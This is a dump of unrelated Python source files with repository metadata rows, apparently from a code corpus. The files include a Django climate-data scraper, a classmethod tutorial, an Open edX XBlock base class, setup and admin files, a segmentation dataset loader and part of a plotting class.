if "Tmin" in url:
climate_obj.min_temp.save("Min_temp", File(file_temp))
if "Tmean" in url:
climate_obj.mean_temp.save("Mean_temp", File(file_temp))
if "Sunshine" in url:
climate_obj.sunshine.save("Sunshine_temp", File(file_temp))
if "Rainfall" in url:
climate_obj.rainfall.save("Rainfall_temp", File(file_temp))
return HttpResponse()
def uk_climate(regin_uk,region):
max_temp_url = [climate_cond for climate_cond in regin_uk if "Tmax" in climate_cond ]
min_temp_url = [climate_cond for climate_cond in regin_uk if "Tmin" in climate_cond]
mean_temp_url = [climate_cond for climate_cond in regin_uk if "Tmean" in climate_cond]
sunshine_url = [climate_cond for climate_cond in regin_uk if "Sunshine" in climate_cond]
rainfall_url = [climate_cond for climate_cond in regin_uk if "Rainfall" in climate_cond]
urls=max_temp_url+min_temp_url+mean_temp_url+sunshine_url+rainfall_url
get_file_climate_condition(urls,region)
return HttpResponse()
def download_climate_files(request):
ClimateStatistics.objects.all().delete()
url = Request("http://www.metoffice.gov.uk/climate/uk/summaries/datasets#Yearorder", headers={'User-Agent': 'Mozilla/5.0'})
site = urlopen(url)
html = site.read().decode('utf-8')
links = re.findall('"((http|ftp)s?://.*?)"', html)
OutputTuple = [(a) for a ,b in links]
year_ordered=[url for url in OutputTuple if "date" in url]
regin_uk=[regin_uk for regin_uk in year_ordered if "/UK.txt" in regin_uk]
regin_england=[regin_england for regin_england in year_ordered if "/England.txt" in regin_england]
regin_wales=[regin_wales for regin_wales in year_ordered if "/Wales.txt" in regin_wales]
regin_scotland=[regin_scotland for regin_scotland in year_ordered if "/Scotland.txt" in regin_scotland]
uk_climate(regin_uk,region="UK")
uk_climate(regin_england,region="England")
uk_climate(regin_wales,region="Wales")
uk_climate(regin_scotland,region="Scotland")
return HttpResponse("Ok")
def text_yearwise_data(request):
ClimateStatistics.objects.all().delete()
path ='C:\\Users\\AMRIT\\Desktop\\project\\climate\\media\\downloads'
files = os.listdir(path)
for file in files:
pathIn = path + "/" + file
id = uuid.uuid1()
print("@@@@@@@@@@@@@@@@@@@@@@@@",id)
in_txt = open(pathIn, mode="r", encoding='utf-8')
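        # Skip the descriptive header lines of these files; the tabular data starts at line 9.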
startFromLine = 9
linesCounter = 1
for line in in_txt:
if linesCounter >=startFromLine :
lis = line.split()
for n, i in enumerate(lis):
if i == "---":
lis[n] = 0
if len(lis)==18:
ClimateStatistics.objects.get_or_create(file_id=id, Year=lis[0], JAN=lis[1], FEB=lis[2], MAR=lis[3],APR=lis[4], MAY=lis[5], JUN=lis[6],JUL=lis[7], AUG=lis[8], SEP=lis[9], OCT=lis[10], NOV=lis[11],
DEC=lis[12], WIN=lis[13], SPR=lis[14], SUM=lis[15], AUT=lis[16],ANN=lis[17]
)
else:
ClimateStatistics.objects.get_or_create(file_id=id, Year=lis[0], JAN=lis[1], FEB=lis[2], MAR=lis[3],
APR=lis[4], MAY=lis[5], JUN=lis[6], JUL=lis[7], WIN=lis[8], SPR=lis[9],
)
linesCounter += 1
null_obj=ClimateStatistics.objects.filter(WIN="---")
for i in null_obj:
i.WIN=0
i.save()
return HttpResponse()
def download_csv(request, queryset):
csv_file = 'C:\\Users\\AMRIT\\Desktop\\project\\climate\\climate_app\\static\\data_extraction\\climate_data.csv'
opts = queryset.model._meta
# the csv writer
writer = csv.writer(open(csv_file, 'w'))
field_names = [field.name for field in opts.fields]
# Write a first row with header information
writer.writerow(field_names[2:])
# Write data rows
for obj in queryset:
writer.writerow([getattr(obj, field) for field in field_names[2:] ])
# print(csv.reader(open(csv_file,'r')))
return csv_file
def convert_to_csv(request,id):
csv_file = download_csv( request, ClimateStatistics.objects.filter(file_id=id).order_by("Year"))
return render(request,'data_extraction/d3.html')
|
[
"kumaramrit38@gmail.com"
] |
kumaramrit38@gmail.com
|
640c741dd9bb3b08088c64b6c6b4ed938a5eee3d
|
0a42fed6746cd9093fc3c3d4fbd7ac5d2cff310f
|
/python高级编程io/study02/code07_class_method.py
|
c1144121a6361a620dbc4cf0b5c7e4b4756da491
|
[] |
no_license
|
luoshanya/Vue_Study
|
4767fc46f2186c75a4b2f7baeeb2fcc9044bd9a4
|
d3a07364a63f0552b166a5697a7245f56e38e78d
|
refs/heads/master
| 2020-06-19T02:15:20.253362
| 2019-07-17T08:49:48
| 2019-07-17T08:49:48
| 196,529,016
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,015
|
py
|
class Date:
def __init__(self, year, month, day):
self.year = year
self.month = month
self.day = day
@staticmethod
def static(str_data):
year, month, day = tuple(str_data.split('-'))
return Date(int(year), int(month), int(day))
@classmethod
def cls_method(cls, str_data):
year, month, day = tuple(str_data.split('-'))
        # cls refers to the class itself here
return cls(int(year), int(month), int(day))
    # mutates an instance attribute
def tomorrow(self):
self.day += 1
def __str__(self):
return '%s/%s/%s' % (self.year, self.month, self.day)
date = Date(2019, 6, 10)
date.tomorrow()
# print(date)
# <scrpt>alter('abc')</script>
data_str = '2019-6-10'
year, month, day = tuple(data_str.split('-'))
date = Date(int(year), int(month), int(day))
# print(date)
# initialization via the staticmethod
date01 = Date.static(data_str)
# print(date01)
# initialization via the classmethod
date02 = Date.cls_method(data_str)
# print(date02)
|
[
"310927880@qq.com"
] |
310927880@qq.com
|
d93e2c2dd0d791c1b5717f893307404535f8267a
|
f36cd54c6b66bcd373b8074bb9738649877f3438
|
/xblock_ifmo/core/xblock_ifmo.py
|
261c287cbec83f1292fdb889566877bd1b7b1643
|
[] |
no_license
|
npoed/ifmo-xblock-framework
|
2f635dfb848f968927122cd36b60fcd74b44ba33
|
d3eece00402eb69ffbdcb95e99c99d0b1c965106
|
refs/heads/master
| 2023-01-01T22:48:22.301231
| 2020-09-30T16:22:15
| 2020-09-30T16:22:15
| 299,882,622
| 0
| 0
| null | 2020-09-30T10:20:28
| 2020-09-30T10:20:27
| null |
UTF-8
|
Python
| false
| false
| 7,591
|
py
|
# -*- coding=utf-8 -*-
import logging
from courseware.models import StudentModule
from django.contrib.auth.models import User
from xblock.core import XBlock
from xmodule.util.duedate import get_extended_due_date
from webob.response import Response
from ..fragment import FragmentMakoChain
from ..utils import require, reify_f, deep_update
from .xblock_ifmo_fields import XBlockFieldsMixin
from .xblock_ifmo_resources import ResourcesMixin
logger = logging.getLogger(__name__)
@ResourcesMixin.register_resource_dir("../resources/ifmo_xblock")
class IfmoXBlock(XBlockFieldsMixin, ResourcesMixin, XBlock):
has_score = True
icon_class = 'problem'
def save_now(self):
"""
        Most blocks use celery on the server, so task references have to be
        saved as soon as the tasks are reserved.
:return:
"""
self.save()
def get_score(self):
return {
'score': self.points * self.weight,
'total': self.weight,
}
def max_score(self):
return self.weight
def save_settings(self, data):
"""
        Not a handler by itself; child handlers can (and should) use it
        whenever the settings need to be saved.
:param data:
:return:
"""
parent = super(IfmoXBlock, self)
if hasattr(parent, 'save_settings'):
parent.save_settings(data)
self.display_name = data.get('display_name')
self.description = data.get('description')
self.weight = data.get('weight')
self.attempts = data.get('attempts')
return {}
def _get_score_string(self):
"""
        A string showing the user's score, displayed next to the header
        (the unit title).
        :return: the score string
"""
result = ''
        # Only shown when the assignment is actually worth points
if self.weight is not None and self.weight != 0:
# if self.attempts > 0:
result = '(%s/%s баллов)' % (self.points * self.weight, self.weight,)
# else:
# result = '(%s points possible)' % (self.weight,)
return result
@XBlock.json_handler
def reset_user_state(self, data, suffix=''):
require(self._is_staff())
module = self.get_module(data.get('user_login'))
if module is not None:
module.state = '{}'
module.max_grade = None
module.grade = None
module.save()
return {
'state': "Состояние пользователя сброшено.",
}
else:
return {
'state': "Модуль для указанного пользователя не существует."
}
@XBlock.json_handler
def get_user_state(self, data, suffix=''):
require(self._is_staff())
module = self.get_module(data.get('user_login'))
if module is not None:
return {'state': module.state}
else:
return {
'state': "Модуль для указанного пользователя не существует."
}
@XBlock.json_handler
def get_user_data(self, data, suffix=''):
context = self.get_student_context_base()
context.update(self.get_student_context())
return context
def student_view(self, context=None):
fragment = FragmentMakoChain(lookup_dirs=self.get_template_dirs(),
content=self.load_template('xblock_ifmo/student_view.mako'))
fragment.add_javascript(self.load_js('ifmo-xblock-utils.js'))
fragment.add_javascript(self.load_js('ifmo-xblock.js'))
fragment.add_javascript(self.load_js('modals/init-modals.js'))
fragment.add_javascript(self.load_js('modals/state-modal.js'))
fragment.add_javascript(self.load_js('modals/debug-info-modal.js'))
fragment.add_css(self.load_css('base.css'))
fragment.add_css(self.load_css('modal.css'))
context = context or {}
deep_update(context, {'render_context': self.get_student_context()})
fragment.add_context(context)
return fragment
def studio_view(self, context=None):
fragment = FragmentMakoChain(lookup_dirs=self.get_template_dirs(),
content=self.load_template('xblock_ifmo/settings_view.mako'))
fragment.add_javascript(self.load_js('ifmo-xblock-utils.js'))
fragment.add_javascript(self.load_js('ifmo-xblock-studio.js'))
fragment.add_css(self.load_css('settings.css'))
fragment.initialize_js('IfmoXBlockSettingsView')
context = context or {}
deep_update(context, {'render_context': self.get_settings_context()})
fragment.add_context(context)
return fragment
@reify_f
def get_student_context(self, user=None):
return self.get_student_context_base(user)
@reify_f
def get_settings_context(self):
return {
'id': str(self.scope_ids.usage_id),
'metadata': {
'display_name': self.display_name,
'description': self.description,
'weight': self.weight,
'attempts': self.attempts,
},
}
def get_student_context_base(self, user=None):
due = get_extended_due_date(self)
return {
'meta': {
'location': str(self.scope_ids.usage_id),
'id': self.scope_ids.usage_id.block_id,
'name': self.display_name,
'text': self.description or "",
'due': due.strftime('%d.%m.%Y %H:%M:%S') if due else None,
'attempts': self.attempts,
},
'student_state': {
'score': {
'earned': self.points * self.weight,
'max': self.weight,
'string': self._get_score_string(),
},
'is_staff': self._is_staff(),
# This is probably studio, find out some more ways to determine this
'is_studio': self._is_studio(),
},
}
def _is_staff(self):
return getattr(self.xmodule_runtime, 'user_is_staff', False)
def _is_studio(self):
return self.runtime.get_real_user is None
def get_response_user_state(self, additional):
context = self.get_student_context_base()
context.update(additional)
return Response(json_body=context)
def get_module(self, user=None):
try:
if isinstance(user, User):
return StudentModule.objects.get(student=user,
module_state_key=self.location)
elif isinstance(user, (basestring, unicode)):
return StudentModule.objects.get(student__username=user,
module_state_key=self.location)
else:
return None
except StudentModule.DoesNotExist:
return None
|
[
"defance@gmail.com"
] |
defance@gmail.com
|
ce66af89f555b5a8250af7fb0556da9101942799
|
71c49e0cf373e72c5792a7e5aa5657400f9d8cf0
|
/photobooth/urls.py
|
c9bfe1b75b74848344e7c76f94b5728af1e1036f
|
[] |
no_license
|
relekang/photobooth
|
5aefaef5fff08008c0c320ee70979ff78eacc1cf
|
9c82d355c6f53a6e2743aabeaf2c040300befbb5
|
refs/heads/master
| 2020-12-14T09:01:33.198677
| 2015-11-22T08:57:05
| 2015-11-22T08:57:41
| 46,576,643
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 606
|
py
|
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from . import views
admin.site.site_header = 'Photobooth'
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/', include('photobooth.api.urls')),
url(r'^accounts/', include('django.contrib.auth.urls')),
url(r'^remote/$', views.Remote.as_view()),
url(r'^$', views.LandingPage.as_view()),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) \
+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"me@rolflekang.com"
] |
me@rolflekang.com
|
f2216bf62f0faca405139c23e58a303ebc325977
|
7c15f211adc9e9eb9f66ccdd570c9f38dff7ea8d
|
/packages/autorest.python/test/vanilla/version-tolerant/Expected/AcceptanceTests/CustomBaseUriVersionTolerant/setup.py
|
6d07b965c77d63558bf25ebcab0b322d3596a6e4
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
Azure/autorest.python
|
cc4bfbf91ae11535731cad37cedd6b733edf1ebd
|
a00d7aaa3753ef05cb5a0d38c664a90869478d44
|
refs/heads/main
| 2023-09-03T06:58:44.246200
| 2023-08-31T20:11:51
| 2023-08-31T20:11:51
| 100,315,955
| 47
| 40
|
MIT
| 2023-09-14T21:00:21
| 2017-08-14T22:58:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,008
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
# coding: utf-8
from setuptools import setup, find_packages
PACKAGE_NAME = "autorestparameterizedhosttestclient"
version = "0.1.0"
setup(
name=PACKAGE_NAME,
version=version,
description="AutoRestParameterizedHostTestClient",
author_email="",
url="",
keywords="azure, azure sdk",
packages=find_packages(),
include_package_data=True,
install_requires=[
"isodate<1.0.0,>=0.6.1",
"azure-core<2.0.0,>=1.28.0",
],
long_description="""\
Test Infrastructure for AutoRest.
""",
)
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
aafdcfbae25f4fcd453f97b9ea98141dc461a671
|
ee86ad4b38f6ba13f195246f14224ba781f933cc
|
/알고리즘실습/AD/부분집합의합.py
|
60a9d43961a2c316d1da35f2f912afff9b53d73c
|
[] |
no_license
|
yejikk/Algorithm
|
aed7adf00c1e32d21b735b3b34dc6cb75049f164
|
531f43305b3a23c824c9e153151b7280c1dc2535
|
refs/heads/master
| 2020-04-17T06:17:28.961656
| 2019-11-16T08:02:49
| 2019-11-16T08:02:49
| 166,318,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 854
|
py
|
import sys
sys.stdin = open('부분집합의합.txt')
def subset(number):
    # number of elements -> S
    # with S elements there are 2**S subsets in total (including the empty set)
arr = [[] for _ in range(2**S)]
    # enumerate every subset by its bitmask
for i in range(1<<S):
        # test one bit per element
for j in range(S):
if i & (1<<j):
arr[i].append(number[j])
return arr
T = int(input())
for tc in range(1, T+1):
S = 12
N, K = map(int, input().split())
number = list(map(int, range(1, S+1)))
setarr = subset(number)
flag = 0
cnt = 0
for i in range(len(setarr)):
if len(setarr[i]) == N and sum(setarr[i]) == K:
cnt += 1
if cnt > 0:
print('#{} {}'.format(tc, cnt))
else:
print('#{} {}'.format(tc, 0))
|
[
"dpwl7484@gmail.com"
] |
dpwl7484@gmail.com
|
46455eebd427110368c6d93e8210a4488b309052
|
fb3b43ab9e7e9874f8cc53caa44f292387d57cf7
|
/Mascotas/apps/mascota/forms.py
|
5ae54464b79e7193d43a79751430327e7d4f962e
|
[] |
no_license
|
CoriAle/zona
|
cdb06e4d9d1a4ed61731a285e5e71df0cdcfec31
|
8bd13ba3bc506f88ad02f26b4562b889effc3ac7
|
refs/heads/master
| 2021-08-06T20:21:04.050053
| 2017-11-07T02:07:47
| 2017-11-07T02:07:47
| 106,186,438
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,580
|
py
|
from django import forms
from apps.mascota.models import Mascota, Vacuna
class MascotaForm(forms.ModelForm):
class Meta:
model = Mascota
fields = [
'nombre',
'edad',
'fecha_rescate',
'genero',
'persona',
'vacuna',
'imagen',
]
        labels = {
            'nombre': 'Nombre',
            'edad': 'Edad',
            'fecha_rescate': 'Fecha de rescate',
            'genero': 'Género',
            'persona': 'Adoptante',
            'vacuna': 'Vacuna',
            'imagen': 'Foto',
        }
widgets = {
'nombre': forms.TextInput(attrs = {'class': 'form-control'}),
'edad': forms.TextInput(attrs = {'class': 'form-control'}),
'fecha_rescate': forms.TextInput(attrs = {'class': 'form-control'}),
'genero': forms.TextInput(attrs = {'class': 'form-control'}),
'persona': forms.Select(attrs = {'class': 'form-control'}),
'vacuna': forms.CheckboxSelectMultiple(),
}
class VacunaForm(forms.ModelForm):
class Meta:
model = Vacuna
fields = [
'nombre',
'fecha_vencimiento' ,
'funcion',
]
        labels = {
            'nombre': 'Nombre',
            'fecha_vencimiento': 'Fecha de caducidad',
            'funcion': 'Indicaciones',
        }
widgets = {
'nombre': forms.TextInput(attrs = {'class': 'form-control'}),
'fecha_vencimiento': forms.DateInput(format = ('%d-%m-%Y'), attrs = {'class': 'form-control'}),
'funcion': forms.Textarea(attrs = {'class': 'form-control'}),
}
|
[
"1995coral@hotmail.es"
] |
1995coral@hotmail.es
|
6137fb40a4e270db6cd3566678423d2092bad69c
|
1d9059e03874838318885990931e4f3dd741bb7e
|
/users/admin.py
|
91278752e36593cd98f7e5f9fc69427026d707bc
|
[] |
no_license
|
Chirag-Django/temp_nonstop
|
fc5efc42d9c484ad3431454f67a428fe5ce94000
|
2c5904d4e12e487447eda9a1d8e4a4b3c17307b9
|
refs/heads/master
| 2023-03-09T12:55:49.953273
| 2021-02-19T01:35:44
| 2021-02-19T01:35:44
| 340,226,456
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 215
|
py
|
from django.contrib import admin
from .models import Profile
# Register your models here.
class ProfileAdmin(admin.ModelAdmin):
list_display = ['user','address','age']
admin.site.register(Profile,ProfileAdmin)
|
[
"chirag.django@gmail.com"
] |
chirag.django@gmail.com
|
90c27e41c4db505141eefc01d03a5c22cf0cab02
|
35271f6bd874799df9a93dbe5bcc50272b619dc1
|
/ML/Pytorch/image_segmentation/semantic_segmentation_unet/dataset.py
|
0c0f098d474994373657cf0a025b40cc55516856
|
[
"MIT"
] |
permissive
|
aladdinpersson/Machine-Learning-Collection
|
c724186b64ae52efa6f9d4e97f37477900901d35
|
558557c7989f0b10fee6e8d8f953d7269ae43d4f
|
refs/heads/master
| 2023-08-31T20:52:06.493437
| 2023-03-21T11:44:08
| 2023-03-21T11:44:08
| 250,184,708
| 5,653
| 2,543
|
MIT
| 2023-09-02T03:51:36
| 2020-03-26T07:02:40
|
Python
|
UTF-8
|
Python
| false
| false
| 978
|
py
|
import os
from PIL import Image
from torch.utils.data import Dataset
import numpy as np
class CarvanaDataset(Dataset):
def __init__(self, image_dir, mask_dir, transform=None):
self.image_dir = image_dir
self.mask_dir = mask_dir
self.transform = transform
self.images = os.listdir(image_dir)
def __len__(self):
return len(self.images)
def __getitem__(self, index):
img_path = os.path.join(self.image_dir, self.images[index])
mask_path = os.path.join(self.mask_dir, self.images[index].replace(".jpg", "_mask.gif"))
image = np.array(Image.open(img_path).convert("RGB"))
mask = np.array(Image.open(mask_path).convert("L"), dtype=np.float32)
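        # Carvana masks store the foreground as 255; binarize to {0.0, 1.0}.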
mask[mask == 255.0] = 1.0
if self.transform is not None:
augmentations = self.transform(image=image, mask=mask)
image = augmentations["image"]
mask = augmentations["mask"]
return image, mask
|
[
"aladdin.persson@hotmail.com"
] |
aladdin.persson@hotmail.com
|
c80d9a2343aca0918bbb101a3c88bd909e4f5918
|
7d2a4c5ca215a362ad6fbb70ef5b5f8c35d41dde
|
/Blogs/migrations/0002_alter_blog_image.py
|
0f7415c8765b564f966cfe2b42c4fbfbbaa858a1
|
[] |
no_license
|
samarthdubey46/e-waste-management-api
|
77dcc92fa31b01830196e5092cb8a9e181963d01
|
db1e8644c907f926f81405de82befe24802ca0f1
|
refs/heads/master
| 2023-07-15T14:15:10.199441
| 2021-08-31T08:02:53
| 2021-08-31T08:02:53
| 400,775,691
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 393
|
py
|
# Generated by Django 3.2.6 on 2021-08-28 08:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Blogs', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='blog',
name='image',
field=models.ImageField(null=True, upload_to='image/blogs/'),
),
]
|
[
"samarthdubey46@gmail.com"
] |
samarthdubey46@gmail.com
|
53a0ba2cffce925eb433917b92108940b30cdadd
|
d41d18d3ea6edd2ec478b500386375a8693f1392
|
/plotly/validators/splom/marker/colorbar/_yanchor.py
|
7bdec6fa6e20bdf476093c16d4c3744796a72d42
|
[
"MIT"
] |
permissive
|
miladrux/plotly.py
|
38921dd6618650d03be9891d6078e771ffccc99a
|
dbb79e43e2cc6c5762251537d24bad1dab930fff
|
refs/heads/master
| 2020-03-27T01:46:57.497871
| 2018-08-20T22:37:38
| 2018-08-20T22:37:38
| 145,742,203
| 1
| 0
|
MIT
| 2018-08-22T17:37:07
| 2018-08-22T17:37:07
| null |
UTF-8
|
Python
| false
| false
| 502
|
py
|
import _plotly_utils.basevalidators
class YanchorValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self,
plotly_name='yanchor',
parent_name='splom.marker.colorbar',
**kwargs
):
super(YanchorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
role='style',
values=['top', 'middle', 'bottom'],
**kwargs
)
|
[
"jon.mease@gmail.com"
] |
jon.mease@gmail.com
|
e6970cb8d04c3a1b3b3da121bdf7651f040de209
|
3bb57eb1f7c1c0aced487e7ce88f3cb84d979054
|
/lseval+lexmturk/scripts/sr_rankers/Run_All_Horn.py
|
eb5c4ae4dfce46d0995eda12dedd951c2de65797
|
[] |
no_license
|
ghpaetzold/phd-backup
|
e100cd0bbef82644dacc73a8d1c6b757b2203f71
|
6f5eee43e34baa796efb16db0bc8562243a049b6
|
refs/heads/master
| 2020-12-24T16:41:21.490426
| 2016-04-23T14:50:07
| 2016-04-23T14:50:07
| 37,981,094
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 806
|
py
|
import os
#Parameters:
Cs = ['1', '0.1']
epsilons = ['0.0001', '0.001']
kernels = ['0', '1', '2', '3', '4']
trainset = '../../corpora/ls_dataset_benchmarking_train.txt'
testset = '../../corpora/ls_dataset_benchmarking_test.txt'
os.system('mkdir ../../sr_rankings/horn')
counter = -1
for C in Cs:
for e in epsilons:
for k in kernels:
counter += 1
output = '../../sr_rankings/horn/ranks_'+C+'_'+e+'_'+k+'.txt'
trfile = './temp/train_feature_file_'+str(counter)+'.txt'
mfile = './temp/model_'+str(counter)+'.txt'
tefile = './temp/test_feature_file_'+str(counter)+'.txt'
sfile = './temp/scores_'+str(counter)+'.txt'
comm = 'nohup python Run_Horn.py '+trainset+' '+trfile+' '+C+' '+e+' '+k+' '+mfile+' '+tefile+' '+sfile+' '+testset+' '+output+' &'
os.system(comm)
#print(comm)
|
[
"ghpaetzold@outlook.com"
] |
ghpaetzold@outlook.com
|
73230a94456e0062d709d371ebeac405c5879b53
|
ee76919635ce69e14ddf64ee9483dca073625aaf
|
/pythonAlgorithm/Practice/15三数之和.py
|
f18feaa502c50835d85034cfb9039363f056ee87
|
[] |
no_license
|
bossjoker1/algorithm
|
574e13f0dd8fe6b3e810efc03649493e90504288
|
c745168a01380edb52155ca3918787d2dd356e5b
|
refs/heads/master
| 2022-07-13T16:26:10.324544
| 2022-07-10T03:28:15
| 2022-07-10T03:28:15
| 407,361,838
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,052
|
py
|
class Solution:
def threeSum(self, nums: List[int]) -> List[List[int]]:
n=len(nums)
res=[]
        # special-case guard
if(not nums or n<3):
return []
nums.sort()
res=[]
for i in range(n):
            # all remaining numbers are positive, so no triple can sum to zero
if(nums[i]>0):
return res
            # skip duplicate anchors to avoid repeated triples
if(i>0 and nums[i]==nums[i-1]):
continue
            # fix i, then slide L and R towards each other
L=i+1
R=n-1
while(L<R):
sum = nums[i]+nums[L]+nums[R]
if(sum==0):
res.append([nums[i],nums[L],nums[R]])
                    # skip duplicates on both pointers
while(L<R and nums[L]==nums[L+1]):
L=L+1
while(L<R and nums[R]==nums[R-1]):
R=R-1
L=L+1
R=R-1
elif(sum>0):
R=R-1
else:
L=L+1
return res
|
[
"1397157763@qq.com"
] |
1397157763@qq.com
|
0063eea34d1491e9546c8c5e3ed0b43f7fb66034
|
d57f981dc8a2cc80a273e49443c8f99aa38b5ad1
|
/posts/admin.py
|
3fbfa6f6c7502a23d5f1054b7a5bb564927db8be
|
[] |
no_license
|
zmm064/TryDjango19
|
cfa048f84e5998c9329ed167b79b6d155d8a7ae0
|
da2191ecc08ec17fb94c2c7510eee6e09d6db71d
|
refs/heads/master
| 2021-04-27T00:20:38.741458
| 2018-03-09T11:15:28
| 2018-03-09T11:15:28
| 123,797,934
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
from django.contrib import admin
# Register your models here.
from .models import Post
class PostAdmin(admin.ModelAdmin):
list_display = ["title", "updated", "timestamp"]
list_display_links = ["updated"]
list_filter = ["updated", "timestamp"]
list_editable = ["title"]
search_fields = ["title", "content"]
class Meta:
model = Post
admin.site.register(Post, PostAdmin)
|
[
"zmm064@foxmail.com"
] |
zmm064@foxmail.com
|
d530d04821718e82725fa9b779b7c11b08bd24ce
|
50e3ae7c6a057fb20af1a14641b3b03ce8b7516d
|
/Python-曾學文/final/subtitleCrawler/subtitleCrawler/subtitleCrawler/spiders/zmtiantang.py
|
f76bc8a05b2e2de0a69c7387e065f8f9cff54730
|
[] |
no_license
|
david30907d/HomeWork
|
a8787093baa95f4a39a0ad255d8a3304f156b6e6
|
6908d4bac7269a65b1e7bc6bca8096c304eeae3f
|
refs/heads/master
| 2020-12-29T02:32:37.124986
| 2018-06-26T14:06:35
| 2018-06-26T14:06:35
| 55,396,758
| 1
| 1
| null | 2019-11-04T03:25:21
| 2016-04-04T08:45:20
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,045
|
py
|
# -*- coding: utf-8 -*-
import scrapy
from bs4 import BeautifulSoup
import requests
import shutil
class ZmtiantangSpider(scrapy.Spider):
name = "zmtiantang"
allowed_domains = ["www.zmtiantang.com"]
start_urls = list(map(lambda x:'http://www.zmtiantang.com/e/action/ListInfo/?classid=1&page=' + str(x), range(4857, 5630)))
def parse(self, response):
        res = BeautifulSoup(response.body, 'html.parser')
downloadURL = res.select('span.label-danger')
for i in downloadURL:
yield scrapy.Request('http://'+self.allowed_domains[0] + i.parent['href'], callback=self.parse_detail)
def parse_detail(self, response):
        res = BeautifulSoup(response.body, 'html.parser')
download = res.select('.btn-sm')[0]
self.download_file('http://'+self.allowed_domains[0] + download['href'])
@staticmethod
def download_file(url):
local_filename = url.split('/')[-1]
r = requests.get(url, stream=True)
with open(local_filename + '.zip', 'wb') as f:
shutil.copyfileobj(r.raw, f)
|
[
"davidtnfsh@gmail.com"
] |
davidtnfsh@gmail.com
|
e06c17fe9746be2b35d591a6f3d3b6a268adc273
|
4947b045d4a221d4e92ac363b22c1213e1c11c0b
|
/eelbrain/plot/_line.py
|
2bfef0d4c951afafc731be98e67076905f3f535f
|
[
"BSD-3-Clause"
] |
permissive
|
weilongzheng/Eelbrain
|
51db9396ba5184493ff59e0d481aac3aae64442c
|
feb9bdec2a99aca3077e44f318aef1c85a2e4730
|
refs/heads/master
| 2020-03-28T18:31:24.633084
| 2018-09-12T02:38:57
| 2018-09-13T20:29:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,895
|
py
|
# -*- coding: utf-8 -*-
# Author: Christian Brodbeck <christianbrodbeck@nyu.edu>
"Line plots"
from itertools import cycle, repeat
import numpy as np
from .._data_obj import ascategorial, asndvar, assub
from ._base import (
EelFigure, Layout, LegendMixin, XAxisMixin, find_axis_params_data,
frame_title)
from functools import reduce
class LineStack(LegendMixin, XAxisMixin, EelFigure):
"""Stack multiple lines vertically
Parameters
----------
y : NDVar
Values to plot.
    x : categorial
Variable to aggregate cases into lines (default is to plot each line).
sub : None | index array
Only use a subset of the data provided.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
offset : float | str
The distance between the baseline (y = 0) for the different lines.
Can be a string expressed as a function of y. For example,
``'0.66 * max(y)'`` will offset each line by 0.66 times the maximum
value in ``y`` (after aggregating if ``x`` is specified). The default is
        ``'y.max() - y.min()'``.
xlim : scalar | (scalar, scalar)
Initial x-axis view limits as ``(left, right)`` tuple or as ``length``
scalar (default is the full x-axis in the data).
xlabel : bool | str
X-axis label. By default the label is inferred from the data.
xticklabels : bool
Print x-axis tick-labels (set to False to suppress them).
ylabel : bool | str
Y-axis label. By default the label is inferred from the data.
colors : dict | sequence of colors
Colors for the lines (default is all lines in black).
ylabels : bool | dict | sequence of str
Labels for the different lines, placed along the y-axis.
legend : str | int | 'fig' | None
Matplotlib figure legend location argument or 'fig' to plot the
legend in a separate figure.
clip : bool
Clip lines outside of axes (default ``True``).
Notes
-----
Navigation:
- ``←``: scroll left
- ``→``: scroll right
- ``home``: scroll to beginning
- ``end``: scroll to end
- ``f``: x-axis zoom in (reduce x axis range)
- ``d``: x-axis zoom out (increase x axis range)
"""
_name = "LineStack"
def __init__(self, y, x=None, sub=None, ds=None, offset='y.max() - y.min()',
ylim=None, xlim=None, xlabel=True, xticklabels=True,
ylabel=True, order=None, colors=None, ylabels=True, xdim=None,
legend=None, clip=True, *args, **kwargs):
sub = assub(sub, ds)
if isinstance(y, (tuple, list)):
if x is not None:
raise TypeError(
"x can only be used to divide y into different lines if y "
"is a single NDVar (got y=%r)." % (y,))
elif order is not None:
raise TypeError("The order parameter only applies if y is a "
"single NDVar")
ys = tuple(asndvar(y_, sub, ds) for y_ in y)
xdims = set(y_.get_dimnames((None,))[0] for y_ in ys)
if len(xdims) > 1:
raise ValueError("NDVars must have same dimension, got %s" %
(tuple(xdims),))
xdim = xdims.pop()
ydata = tuple(y_.get_data(xdim) for y_ in ys)
ny = len(ydata)
xdim_objs = tuple(y_.get_dim(xdim) for y_ in ys)
xdata = tuple(d._axis_data() for d in xdim_objs)
xdim_obj = reduce(lambda d1, d2: d1._union(d2), xdim_objs)
if isinstance(offset, str):
offset = max(eval(offset, {'y': y_}) for y_ in ydata)
cells = cell_labels = tuple(y_.name for y_ in ys)
if ylabel is True:
_, ylabel = find_axis_params_data(ys[0], ylabel)
epochs = (ys,)
else:
